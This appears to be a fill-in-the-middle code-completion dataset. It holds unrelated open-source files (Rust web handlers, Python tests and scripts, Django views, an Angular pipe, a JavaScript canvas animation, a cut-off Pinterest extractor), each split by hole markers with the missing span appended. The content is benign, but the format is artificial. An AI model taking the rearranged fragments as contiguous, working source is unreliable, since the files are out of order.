body: Box::new(Cursor::new(json.into_bytes())),
};
fn fixup(json: Json) -> Json {
match json {
Json::Object(object) => {
Json::Object(object.into_iter().map(|(k, v)| {
let k = if k == "krate" {
"crate".to_string()
} else {
k
};
(k, fixup(v))
}).collect())
}
Json::Array(list) => {
Json::Array(list.into_iter().map(fixup).collect())
}
j => j,
}
}
}
impl<'a> RequestUtils for Request + 'a {
fn json<T: Encodable>(&self, t: &T) -> Response {
json_response(t)
}
fn query(&self) -> HashMap<String, String> {
url::form_urlencoded::parse(self.query_string().unwrap_or("")
.as_bytes())
.into_iter().collect()
}
fn redirect(&self, url: String) -> Response {
let mut headers = HashMap::new();
headers.insert("Location".to_string(), vec![url.to_string()]);
Response {
status: (302, "Found"),
headers: headers,
body: Box::new(io::empty()),
}
}
fn wants_json(&self) -> bool {
let content = self.headers().find("Accept").unwrap_or(Vec::new());
content.iter().any(|s| s.contains("json"))
}
fn pagination(&self, default: usize, max: usize) -> CargoResult<(i64, i64)> {
let query = self.query();
let page = query.get("page").and_then(|s| s.parse::<usize>().ok())
.unwrap_or(1);
let limit = query.get("per_page").and_then(|s| s.parse::<usize>().ok())
.unwrap_or(default);
if limit > max {
return Err(human(format!("cannot request more than {} items", max)))
}
Ok((((page - 1) * limit) as i64, limit as i64))
}
}
pub struct C(pub fn(&mut Request) -> CargoResult<Response>);
impl Handler for C {
fn call(&self, req: &mut Request) -> Result<Response, Box<Error+Send>> {
let C(f) = *self;
match f(req) {
Ok(resp) => { req.commit(); Ok(resp) }
Err(e) => {
match e.response() {
Some(response) => Ok(response),
None => Err(std_error(e))
}
}
}
}
}
pub struct R<H>(pub Arc<H>);
impl<H: Handler> Handler for R<H> {
fn call(&self, req: &mut Request) -> Result<Response, Box<Error+Send>> {
let path = req.params()["path"].to_string();
let R(ref sub_router) = *self;
sub_router.call(&mut RequestProxy {
other: req,
path: Some(&path),
method: None,
})
}
}
pub struct R404(pub RouteBuilder);
impl Handler for R404 {
fn call(&self, req: &mut Request) -> Result<Response, Box<Error+Send>> {
let R404(ref router) = *self;
match router.recognize(&req.method(), req.path()) {
Ok(m) => {
req.mut_extensions().insert(m.params.clone());
m.handler.call(req)
}
Err(..) => Ok(NotFound.response().unwrap()),
}
}
}<|fim▁end|>
|
use url;
|
<|file_name|>pandas 8 - Standard Deviation.py<|end_file_name|><|fim▁begin|>import pandas as pd
from pandas import DataFrame
from matplotlib import pyplot as plt
from matplotlib import style
style.use('ggplot')
df = pd.read_csv('sp500_ohlc.csv', index_col = 'Date', parse_dates=True)
#print df.head()
df['STD'] = pd.rolling_std(df['Close'], 25, min_periods=1)
ax1 = plt.subplot(2, 1, 1)
df['Close'].plot()
plt.ylabel('Close')
# do not do sharex first
ax2 = plt.subplot(2, 1, 2, sharex = ax1)
df['STD'].plot()
plt.ylabel('Standard Deviation')
<|fim▁hole|><|fim▁end|>
|
plt.show()
|
<|file_name|>poid.pipe.ts<|end_file_name|><|fim▁begin|>import { Pipe, PipeTransform } from '@angular/core';
@Pipe({
name: 'poname'
})
export class PoidPipe implements PipeTransform {
transform(item: any, purOrderNo: any): any {<|fim▁hole|> if(purOrderNo == undefined) return item;
//return updated array
return item.filter(function(item){
return item.supplier_id.includes(purOrderNo);
});
}
}<|fim▁end|>
|
//chek if any value undefined
|
<|file_name|>vpcmpistri.rs<|end_file_name|><|fim▁begin|>use ::{BroadcastMode, Instruction, MaskReg, MergeMode, Mnemonic, OperandSize, Reg, RoundingMode};
use ::RegType::*;<|fim▁hole|>use ::Operand::*;
use ::Reg::*;
use ::RegScale::*;
fn vpcmpistri_1() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM2)), operand2: Some(Direct(XMM6)), operand3: Some(Literal8(114)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 214, 114], OperandSize::Dword)
}
fn vpcmpistri_2() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM0)), operand2: Some(Indirect(EDI, Some(OperandSize::Xmmword), None)), operand3: Some(Literal8(41)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 7, 41], OperandSize::Dword)
}
fn vpcmpistri_3() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM6)), operand2: Some(Direct(XMM0)), operand3: Some(Literal8(0)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 240, 0], OperandSize::Qword)
}
fn vpcmpistri_4() {
run_test(&Instruction { mnemonic: Mnemonic::VPCMPISTRI, operand1: Some(Direct(XMM2)), operand2: Some(IndirectScaledDisplaced(RBX, Eight, 1057295119, Some(OperandSize::Xmmword), None)), operand3: Some(Literal8(114)), operand4: None, lock: false, rounding_mode: None, merge_mode: None, sae: false, mask: None, broadcast: None }, &[196, 227, 121, 99, 20, 221, 15, 11, 5, 63, 114], OperandSize::Qword)
}<|fim▁end|>
|
use ::instruction_def::*;
|
<|file_name|>test_sitecustomize.py<|end_file_name|><|fim▁begin|># -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2017,2020 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from textwrap import dedent
from testtools.matchers import Contains, FileContains
from snapcraft.plugins.v1 import _python
from ._basesuite import PythonBaseTestCase
def _create_site_py(base_dir):
site_py = os.path.join(base_dir, "usr", "lib", "pythontest", "site.py")
os.makedirs(os.path.dirname(site_py))
open(site_py, "w").close()
def _create_user_site_packages(base_dir):
user_site_dir = os.path.join(base_dir, "lib", "pythontest", "site-packages")
os.makedirs(user_site_dir)
class SiteCustomizeTestCase(PythonBaseTestCase):
def setUp(self):
super().setUp()
self.expected_sitecustomize = dedent(
"""\
import site
import os
snap_dir = os.getenv("SNAP")
snapcraft_stage_dir = os.getenv("SNAPCRAFT_STAGE")
snapcraft_part_install = os.getenv("SNAPCRAFT_PART_INSTALL")
# Do not include snap_dir during builds as this will include
# snapcraft's in-snap site directory.
if snapcraft_stage_dir is not None and snapcraft_part_install is not None:
site_directories = [snapcraft_stage_dir, snapcraft_part_install]
else:
site_directories = [snap_dir]
for d in site_directories:
if d:
site_dir = os.path.join(d, "lib/pythontest/site-packages")
site.addsitedir(site_dir)
if snap_dir:
site.ENABLE_USER_SITE = False"""
)
def test_generate_sitecustomize_staged(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the staging area
self._create_python_binary(stage_dir)
# Create a site.py in both staging and install areas
_create_site_py(stage_dir)
_create_site_py(install_dir)
# Create a user site dir in install area
_create_user_site_packages(install_dir)
_python.generate_sitecustomize(
"test", stage_dir=stage_dir, install_dir=install_dir
)
site_path = os.path.join(
install_dir, "usr", "lib", "pythontest", "sitecustomize.py"
)
self.assertThat(site_path, FileContains(self.expected_sitecustomize))
def test_generate_sitecustomize_installed(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the installed area
self._create_python_binary(install_dir)
# Create a site.py in both staging and install areas
_create_site_py(stage_dir)
_create_site_py(install_dir)
# Create a user site dir in install area
_create_user_site_packages(install_dir)
_python.generate_sitecustomize(
"test", stage_dir=stage_dir, install_dir=install_dir
)
site_path = os.path.join(
install_dir, "usr", "lib", "pythontest", "sitecustomize.py"
)
self.assertThat(site_path, FileContains(self.expected_sitecustomize))
def test_generate_sitecustomize_missing_user_site_raises(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the installed area
self._create_python_binary(install_dir)
# Create a site.py in both staging and install areas
_create_site_py(stage_dir)
_create_site_py(install_dir)
# Do NOT create a user site dir, and attempt to generate sitecustomize.
raised = self.assertRaises(
_python.errors.MissingUserSitePackagesError,
_python.generate_sitecustomize,<|fim▁hole|> stage_dir=stage_dir,
install_dir=install_dir,
)
self.assertThat(str(raised), Contains("Unable to find user site packages"))
def test_generate_sitecustomize_missing_site_py_raises(self):
stage_dir = "stage_dir"
install_dir = "install_dir"
# Create the python binary in the staging area
self._create_python_binary(stage_dir)
# Create a site.py, but only in install area (not staging area)
_create_site_py(install_dir)
# Create a user site dir in install area
_create_user_site_packages(install_dir)
raised = self.assertRaises(
_python.errors.MissingSitePyError,
_python.generate_sitecustomize,
"test",
stage_dir=stage_dir,
install_dir=install_dir,
)
self.assertThat(str(raised), Contains("Unable to find site.py"))<|fim▁end|>
|
"test",
|
<|file_name|>demo06.py<|end_file_name|><|fim▁begin|># Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from __future__ import print_function
import fixpath
import colorama
from colorama import Fore, Back, Style
from random import randint, choice
from string import printable
# Fore, Back and Style are convenience classes for the constant ANSI strings that set
# the foreground, background and style. The don't have any magic of their own.
FORES = [ Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE ]
BACKS = [ Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE ]
STYLES = [ Style.DIM, Style.NORMAL, Style.BRIGHT ]
# This assumes your terminal is 80x24. Ansi minimum coordinate is (1,1).
MINY, MAXY = 1, 24
MINX, MAXX = 1, 80
# set of printable ASCII characters, including a space.
CHARS = ' ' + printable.strip()
PASSES = 1000
def main():
colorama.init()
# gratuitous use of lambda.
pos = lambda y, x: '\x1b[%d;%dH' % (y, x)
# draw a white border.
print(Back.WHITE, end='')
print('%s%s' % (pos(MINY, MINX), ' '*MAXX), end='')
for y in range(MINY, 1+MAXY):
print('%s %s ' % (pos(y, MINX), pos(y, MAXX)), end='')
print('%s%s' % (pos(MAXY, MINX), ' '*MAXX), end='')
# draw some blinky lights for a while.
for i in range(PASSES):<|fim▁hole|>if __name__ == '__main__':
main()<|fim▁end|>
|
print('%s%s%s%s%s' % (pos(randint(1+MINY,MAXY-1), randint(1+MINX,MAXX-1)), choice(FORES), choice(BACKS), choice(STYLES), choice(CHARS)), end='')
# put cursor to top, left, and set color to white-on-black with normal brightness.
print('%s%s%s%s' % (pos(MINY, MINX), Fore.WHITE, Back.BLACK, Style.NORMAL), end='')
|
<|file_name|>math.rs<|end_file_name|><|fim▁begin|>command!(multiply(_ctx, msg, _args, one: f64, two: f64) {
let product = one * two;<|fim▁hole|> let _ = msg.channel_id.say(&product.to_string());
});<|fim▁end|>
| |
<|file_name|>base.py<|end_file_name|><|fim▁begin|>import os
import unittest
import mock
from pulp.server.db import connection
class PulpWebservicesTests(unittest.TestCase):
"""
Base class for tests of webservice controllers. This base is used to work around the
authentication tests for each each method
"""
<|fim▁hole|> self.patch1 = mock.patch('pulp.server.webservices.controllers.decorators.'
'check_preauthenticated')
self.patch2 = mock.patch('pulp.server.webservices.controllers.decorators.'
'is_consumer_authorized')
self.patch3 = mock.patch('pulp.server.webservices.http.resource_path')
self.patch4 = mock.patch('pulp.server.webservices.http.header')
self.patch5 = mock.patch('web.webapi.HTTPError')
self.patch6 = mock.patch('pulp.server.managers.factory.principal_manager')
self.patch7 = mock.patch('pulp.server.managers.factory.user_query_manager')
self.patch8 = mock.patch('pulp.server.webservices.http.uri_path')
self.mock_check_pre_auth = self.patch1.start()
self.mock_check_pre_auth.return_value = 'ws-user'
self.mock_check_auth = self.patch2.start()
self.mock_check_auth.return_value = True
self.mock_http_resource_path = self.patch3.start()
self.patch4.start()
self.patch5.start()
self.patch6.start()
self.mock_user_query_manager = self.patch7.start()
self.mock_user_query_manager.return_value.is_superuser.return_value = False
self.mock_user_query_manager.return_value.is_authorized.return_value = True
self.mock_uri_path = self.patch8.start()
self.mock_uri_path.return_value = "/mock/"
def tearDown(self):
self.patch1.stop()
self.patch2.stop()
self.patch3.stop()
self.patch4.stop()
self.patch5.stop()
self.patch6.stop()
self.patch7.stop()
self.patch8.stop()
def validate_auth(self, operation):
"""
validate that a validation check was performed for a given operation
:param operation: the operation to validate
"""
self.mock_user_query_manager.return_value.is_authorized.assert_called_once_with(mock.ANY, mock.ANY, operation)
def get_mock_uri_path(self, *args):
"""
:param object_id: the id of the object to get the uri for
:type object_id: str
"""
return os.path.join('/mock', *args) + '/'<|fim▁end|>
|
def setUp(self):
connection.initialize()
|
<|file_name|>vcpu_model.py<|end_file_name|><|fim▁begin|># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils<|fim▁hole|>from nova.db import api as db
from nova.objects import base
from nova.objects import fields
@base.NovaObjectRegistry.register
class VirtCPUModel(base.NovaObject):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'arch': fields.ArchitectureField(nullable=True),
'vendor': fields.StringField(nullable=True),
'topology': fields.ObjectField('VirtCPUTopology',
nullable=True),
'features': fields.ListOfObjectsField("VirtCPUFeature",
default=[]),
'mode': fields.CPUModeField(nullable=True),
'model': fields.StringField(nullable=True),
'match': fields.CPUMatchField(nullable=True),
}
def obj_load_attr(self, attrname):
setattr(self, attrname, None)
def to_json(self):
return jsonutils.dumps(self.obj_to_primitive())
@classmethod
def from_json(cls, jsonstr):
return cls.obj_from_primitive(jsonutils.loads(jsonstr))
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_extra = db.instance_extra_get_by_instance_uuid(
context, instance_uuid, columns=['vcpu_model'])
if not db_extra or not db_extra['vcpu_model']:
return None
return cls.obj_from_primitive(jsonutils.loads(db_extra['vcpu_model']))
@base.NovaObjectRegistry.register
class VirtCPUFeature(base.NovaObject):
VERSION = '1.0'
fields = {
'policy': fields.CPUFeaturePolicyField(nullable=True),
'name': fields.StringField(nullable=False),
}
def obj_load_attr(self, attrname):
setattr(self, attrname, None)<|fim▁end|>
| |
<|file_name|>script.js<|end_file_name|><|fim▁begin|>$(document).ready(function () {
startAnimation();
});
if (!window.requestAnimationFrame) {
window.requestAnimationFrame = (window.webkitRequestAnimationFrame || window.mozRequestAnimationFrame || window.msRequestAnimationFrame || window.oRequestAnimationFrame || function (callback) {
return window.setTimeout(callback, 1000 / 60);
});
}
<|fim▁hole|> var $canvas = $(canvas),
context = canvas.getContext('2d'),
defaults = {
star: {
color: 'rgba(255, 255, 255, .5)',
width: 2
},
line: {
color: 'rgba(255, 255, 255, .5)',
width: 0.4
},
position: {
x: 0, // This value will be overwritten at startup
y: 0 // This value will be overwritten at startup
},
width: window.innerWidth,
height: window.innerHeight,
velocity: 0.1,
length: 100,
distance: 120,
radius: 150,
stars: []
},
config = $.extend(true, {}, defaults, options);
function Star () {
this.x = Math.random() * canvas.width;
this.y = Math.random() * canvas.height;
this.vx = (config.velocity - (Math.random() * 0.5));
this.vy = (config.velocity - (Math.random() * 0.5));
this.radius = Math.random() * config.star.width;
}
Star.prototype = {
create: function(){
context.beginPath();
context.arc(this.x, this.y, this.radius, 0, Math.PI * 2, false);
context.fill();
},
animate: function(){
var i;
for (i = 0; i < config.length; i++) {
var star = config.stars[i];
if (star.y < 0 || star.y > canvas.height) {
star.vx = star.vx;
star.vy = - star.vy;
} else if (star.x < 0 || star.x > canvas.width) {
star.vx = - star.vx;
star.vy = star.vy;
}
star.x += star.vx;
star.y += star.vy;
}
},
line: function(){
var length = config.length,
iStar,
jStar,
i,
j;
for (i = 0; i < length; i++) {
for (j = 0; j < length; j++) {
iStar = config.stars[i];
jStar = config.stars[j];
if (
(iStar.x - jStar.x) < config.distance &&
(iStar.y - jStar.y) < config.distance &&
(iStar.x - jStar.x) > - config.distance &&
(iStar.y - jStar.y) > - config.distance
) {
if (
(iStar.x - config.position.x) < config.radius &&
(iStar.y - config.position.y) < config.radius &&
(iStar.x - config.position.x) > - config.radius &&
(iStar.y - config.position.y) > - config.radius
) {
context.beginPath();
context.moveTo(iStar.x, iStar.y);
context.lineTo(jStar.x, jStar.y);
context.stroke();
context.closePath();
}
}
}
}
}
};
this.createStars = function () {
var length = config.length,
star,
i;
context.clearRect(0, 0, canvas.width, canvas.height);
for (i = 0; i < length; i++) {
config.stars.push(new Star());
star = config.stars[i];
star.create();
}
star.line();
star.animate();
};
this.setCanvas = function () {
canvas.width = config.width;
canvas.height = config.height;
};
this.setContext = function () {
context.fillStyle = config.star.color;
context.strokeStyle = config.line.color;
context.lineWidth = config.line.width;
};
this.setInitialPosition = function () {
if (!options || !options.hasOwnProperty('position')) {
config.position = {
x: canvas.width * 0.5,
y: canvas.height * 0.5
};
}
};
this.loop = function (callback) {
callback();
window.requestAnimationFrame(function () {
this.loop(callback);
}.bind(this));
};
this.bind = function () {
$canvas.on('mousemove', function(e){
config.position.x = e.pageX - $canvas.offset().left;
config.position.y = e.pageY - $canvas.offset().top;
});
};
this.init = function () {
this.setCanvas();
this.setContext();
this.setInitialPosition();
this.loop(this.createStars);
this.bind();
};
}
$.fn.constellation = function (options) {
return this.each(function () {
var c = new Constellation(this, options);
c.init();
});
};
})($, window);
var startAnimation = function() {
window.addEventListener("resize", function() { startAnimation()} );
$('canvas').constellation({
line: {
color: 'rgba(255, 255, 255, .5)'
}
});
};<|fim▁end|>
|
(function ($, window) {
function Constellation (canvas, options) {
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.shortcuts import render
from enfermeriaapp.models import Cola_Consulta, Cola_Enfermeria
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from django.utils import timezone
import time
from django.contrib import messages
from django.contrib.auth.decorators import login_required
import datetime
from django.db import connection
import json
from datospersonalesapp.models import Paciente
from nuevoingresoapp.models import Expediente_Provisional
from enfermeriaapp.forms import ColaEnfermeriaForm
# Vista para poner un nuevo paciente en la cola para la toma de signos vitales
@login_required(login_url='logins')
def cola_enfermeria_nuevo(request,pk):
info = ""
pacientes=Paciente.objects.filter(estadoExpediente='A').order_by('facultadE')
cursor = connection.cursor()
cursor.execute('SELECT distinct(p.facultadE_id), f.nombreFacultad FROM datospersonalesapp_paciente as p, datospersonalesapp_facultad as f WHERE p.facultadE_id = f.codigoFacultad ORDER BY f.nombreFacultad')
auxL = cursor.fetchall()
if request.method == "GET":
data = {'idPaciente':Paciente.objects.filter(codigoPaciente = pk)
}
form = ColaEnfermeriaForm(data)
existe = Cola_Enfermeria.objects.filter(idPaciente = pk)
if existe:
info="El paciente ya existe en la cola"
else:
if form.is_valid():
expediente = form.save(commit=False)
expediente.hora = time.strftime("%H:%M:%S") #Formato de 24 horas
expediente.save()
info = "Datos Guardados Exitosamen"
return render(request,"datospersonales/paciente_list.html",{'personalpaciente':pacientes,'datoFacult':auxL,'informacion':info})
else:
form=ColaEnfermeriaForm()
info = "Ocurrio un error los datos no se guardaron"<|fim▁hole|>def cola_enfermeria_list(request):
cola=Cola_Enfermeria.objects.order_by('hora')
return render(request,"enfermeriaapp/cola_enfermeria_list.html",{'cola':cola})
# Vista para borrar manualmente un paciente en la cola para la toma de signos vitales
@login_required(login_url='logins')
def cola_enfermeria_borrar(request,pk):
cola=Cola_Enfermeria.objects.order_by('hora')
info = ""
if request.method == "GET":
data = {'idPaciente':Paciente.objects.filter(codigoPaciente = pk)
}
form = ColaEnfermeriaForm(data)
existe = Cola_Enfermeria.objects.filter(idPaciente = pk)
if existe:
if form.is_valid():
existe.delete()
info = "Datos eliminados exitosamente"
return render(request,"enfermeriaapp/cola_enfermeria_list.html",{'cola':cola})
else:
form=ColaEnfermeriaForm()
info = "Ocurrio un error no se pudo eliminar el paciente de la cola"
else:
info="El paciente no existe en la cola"
return render(request,"enfermeriaapp/cola_enfermeria_list.html",{'cola':cola})
#Muestra el listado de pacientes en cola para pasar consulta
@login_required(login_url='logins')
def cola_consulta_list(request):
cursor = connection.cursor()
cursor.execute('SELECT distinct(p.nit) as codigo, p.nombrePrimero as nombre,p.nombreSegundo as nombreSegundo, p.apellidoPrimero as apellido,c.hora,c.idDoctor_id as doctor FROM datospersonalesapp_paciente as p, enfermeriaapp_cola_consulta as c WHERE p.nit = c.nit')
cursor2 = connection.cursor()
cursor2.execute('SELECT distinct(p.nit) as codigo, p.nombrePrimero as nombre,p.nombreSegundo as nombreSegundo, p.apellidoPrimero as apellido,c.hora,c.idDoctor_id as doctor FROM nuevoingresoapp_expediente_provisional as p, enfermeriaapp_cola_consulta as c WHERE p.nit = c.nit')
cola = cursor.fetchall()
cola += cursor2.fetchall()
#cola=Cola_Consulta.objects.order_by('hora')
return render(request,"enfermeriaapp/cola_consulta_list.html",{'cola':cola})<|fim▁end|>
|
return render(request,"datospersonales/paciente_list.html",{'personalpaciente':pacientes,'datoFacult':auxL,'informacion':info})
#Muestra el listado de pacientes en cola para tomarles signos vitales
@login_required(login_url='logins')
|
<|file_name|>19180cf98af6_nsx_gw_devices.py<|end_file_name|><|fim▁begin|># Copyright 2014 OpenStack Foundation<|fim▁hole|>#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""nsx_gw_devices
Revision ID: 19180cf98af6
Revises: 117643811bca
Create Date: 2014-02-26 02:46:26.151741
"""
# revision identifiers, used by Alembic.
revision = '19180cf98af6'
down_revision = '117643811bca'
# Change to ['*'] if this migration applies to all plugins
migration_for_plugins = [
'neutron.plugins.nicira.NeutronPlugin.NvpPluginV2',
'neutron.plugins.nicira.NeutronServicePlugin.NvpAdvancedPlugin',
'neutron.plugins.vmware.plugin.NsxPlugin',
'neutron.plugins.vmware.plugin.NsxServicePlugin'
]
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.create_table(
'networkgatewaydevicereferences',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('network_gateway_id', sa.String(length=36), nullable=True),
sa.Column('interface_name', sa.String(length=64), nullable=True),
sa.ForeignKeyConstraint(['network_gateway_id'], ['networkgateways.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id', 'network_gateway_id', 'interface_name'),
mysql_engine='InnoDB')
# Copy data from networkgatewaydevices into networkgatewaydevicereference
op.execute("INSERT INTO networkgatewaydevicereferences SELECT "
"id, network_gateway_id, interface_name FROM "
"networkgatewaydevices")
# drop networkgatewaydevices
op.drop_table('networkgatewaydevices')
op.create_table(
'networkgatewaydevices',
sa.Column('tenant_id', sa.String(length=255), nullable=True),
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('nsx_id', sa.String(length=36), nullable=True),
sa.Column('name', sa.String(length=255), nullable=True),
sa.Column('connector_type', sa.String(length=10), nullable=True),
sa.Column('connector_ip', sa.String(length=64), nullable=True),
sa.Column('status', sa.String(length=16), nullable=True),
sa.PrimaryKeyConstraint('id'),
mysql_engine='InnoDB')
# Create a networkgatewaydevice for each existing reference.
# For existing references nsx_id == neutron_id
# Do not fill conenctor info as they would be unknown
op.execute("INSERT INTO networkgatewaydevices (id, nsx_id) SELECT "
"id, id as nsx_id FROM networkgatewaydevicereferences")
def downgrade(active_plugins=None, options=None):
if not migration.should_run(active_plugins, migration_for_plugins):
return
op.drop_table('networkgatewaydevices')
# Re-create previous version of networkgatewaydevices table
op.create_table(
'networkgatewaydevices',
sa.Column('id', sa.String(length=36), nullable=False),
sa.Column('network_gateway_id', sa.String(length=36), nullable=True),
sa.Column('interface_name', sa.String(length=64), nullable=True),
sa.ForeignKeyConstraint(['network_gateway_id'], ['networkgateways.id'],
ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
mysql_engine='InnoDB')
# Copy from networkgatewaydevicereferences to networkgatewaydevices
op.execute("INSERT INTO networkgatewaydevices SELECT "
"id, network_gateway_id, interface_name FROM "
"networkgatewaydevicereferences")
# Dropt networkgatewaydevicereferences
op.drop_table('networkgatewaydevicereferences')<|fim▁end|>
| |
<|file_name|>test_import_wallet.py<|end_file_name|><|fim▁begin|>import pytest
from indy import IndyError
from indy import did
from indy import wallet
from indy.error import ErrorCode
@pytest.mark.asyncio
@pytest.mark.parametrize("wallet_handle_cleanup", [False])
async def test_import_wallet_works(wallet_handle, wallet_config, credentials, export_config):
(_did, _verkey) = await did.create_and_store_my_did(wallet_handle, "{}")
await did.set_did_metadata(wallet_handle, _did, "metadata")
did_with_meta_before = await did.get_my_did_with_meta(wallet_handle, _did)
await wallet.export_wallet(wallet_handle, export_config)
await wallet.close_wallet(wallet_handle)
await wallet.delete_wallet(wallet_config, credentials)
await wallet.import_wallet(wallet_config, credentials, export_config)
wallet_handle = await wallet.open_wallet(wallet_config, credentials)
<|fim▁hole|>
@pytest.mark.asyncio
async def test_import_wallet_works_for_not_exit_path(wallet_config, credentials, export_config):
with pytest.raises(IndyError) as e:
await wallet.import_wallet(wallet_config, credentials, export_config)
assert ErrorCode.CommonIOError == e.value.error_code<|fim▁end|>
|
did_with_meta_after = await did.get_my_did_with_meta(wallet_handle, _did)
assert did_with_meta_before == did_with_meta_after
await wallet.close_wallet(wallet_handle)
|
<|file_name|>view.js<|end_file_name|><|fim▁begin|>(function(){
var getDataBtn = document.getElementById('btn-getdata');
var content = document.getElementById('content');
getDataBtn.addEventListener('click',getCourseData);<|fim▁hole|>
function getCourseData(){
datacontext().getCourseSessions(function(courseSessions){
renderView(courseSessions);
});
}
function renderView(sessions){
content.innerHTML = JSON.stringify(sessions);
}
})();<|fim▁end|>
| |
<|file_name|>language.py<|end_file_name|><|fim▁begin|>from django.conf import settings
from django.template import loader
from django.views.i18n import set_language
from xadmin.plugins.utils import get_context_dict
from xadmin.sites import site
from xadmin.views import BaseAdminPlugin, CommAdminView, BaseAdminView
<|fim▁hole|>class SetLangNavPlugin(BaseAdminPlugin):
def block_top_navmenu(self, context, nodes):
context = get_context_dict(context)
context['redirect_to'] = self.request.get_full_path()
nodes.append(loader.render_to_string('xadmin/blocks/comm.top.setlang.html', context=context))
class SetLangView(BaseAdminView):
def post(self, request, *args, **kwargs):
if 'nav_menu' in request.session:
del request.session['nav_menu']
return set_language(request)
if settings.LANGUAGES and 'django.middleware.locale.LocaleMiddleware' in settings.MIDDLEWARE_CLASSES:
site.register_plugin(SetLangNavPlugin, CommAdminView)
site.register_view(r'^i18n/setlang/$', SetLangView, 'set_language')<|fim▁end|>
| |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from flask import session
from werkzeug.exceptions import Forbidden
from indico.modules.rb.controllers import RHRoomBookingBase
from indico.modules.rb.util import rb_is_admin
from indico.util.i18n import _
class RHRoomBookingAdminBase(RHRoomBookingBase):
"""
Adds admin authorization. All classes that implement admin
tasks should be derived from this class.
"""<|fim▁hole|> def _checkProtection(self):
if session.user is None:
self._checkSessionUser()
elif not rb_is_admin(session.user):
raise Forbidden(_('You are not authorized to take this action.'))<|fim▁end|>
| |
<|file_name|>pinterest.py<|end_file_name|><|fim▁begin|># coding: utf-8
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..compat import compat_str
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
try_get,
unified_timestamp,
url_or_none,
)
class PinterestBaseIE(InfoExtractor):
_VALID_URL_BASE = r'https?://(?:[^/]+\.)?pinterest\.(?:com|fr|de|ch|jp|cl|ca|it|co\.uk|nz|ru|com\.au|at|pt|co\.kr|es|com\.mx|dk|ph|th|com\.uy|co|nl|info|kr|ie|vn|com\.vn|ec|mx|in|pe|co\.at|hu|co\.in|co\.nz|id|com\.ec|com\.py|tw|be|uk|com\.bo|com\.pe)'
def _call_api(self, resource, video_id, options):
return self._download_json(
'https://www.pinterest.com/resource/%sResource/get/' % resource,
video_id, 'Download %s JSON metadata' % resource, query={
'data': json.dumps({'options': options})
})['resource_response']
def _extract_video(self, data, extract_formats=True):
video_id = data['id']
title = (data.get('title') or data.get('grid_title') or video_id).strip()
urls = []
formats = []
duration = None
if extract_formats:
for format_id, format_dict in data['videos']['video_list'].items():
if not isinstance(format_dict, dict):<|fim▁hole|> continue
urls.append(format_url)
duration = float_or_none(format_dict.get('duration'), scale=1000)
ext = determine_ext(format_url)
if 'hls' in format_id.lower() or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4', entry_protocol='m3u8_native',
m3u8_id=format_id, fatal=False))
else:
formats.append({
'url': format_url,
'format_id': format_id,
'width': int_or_none(format_dict.get('width')),
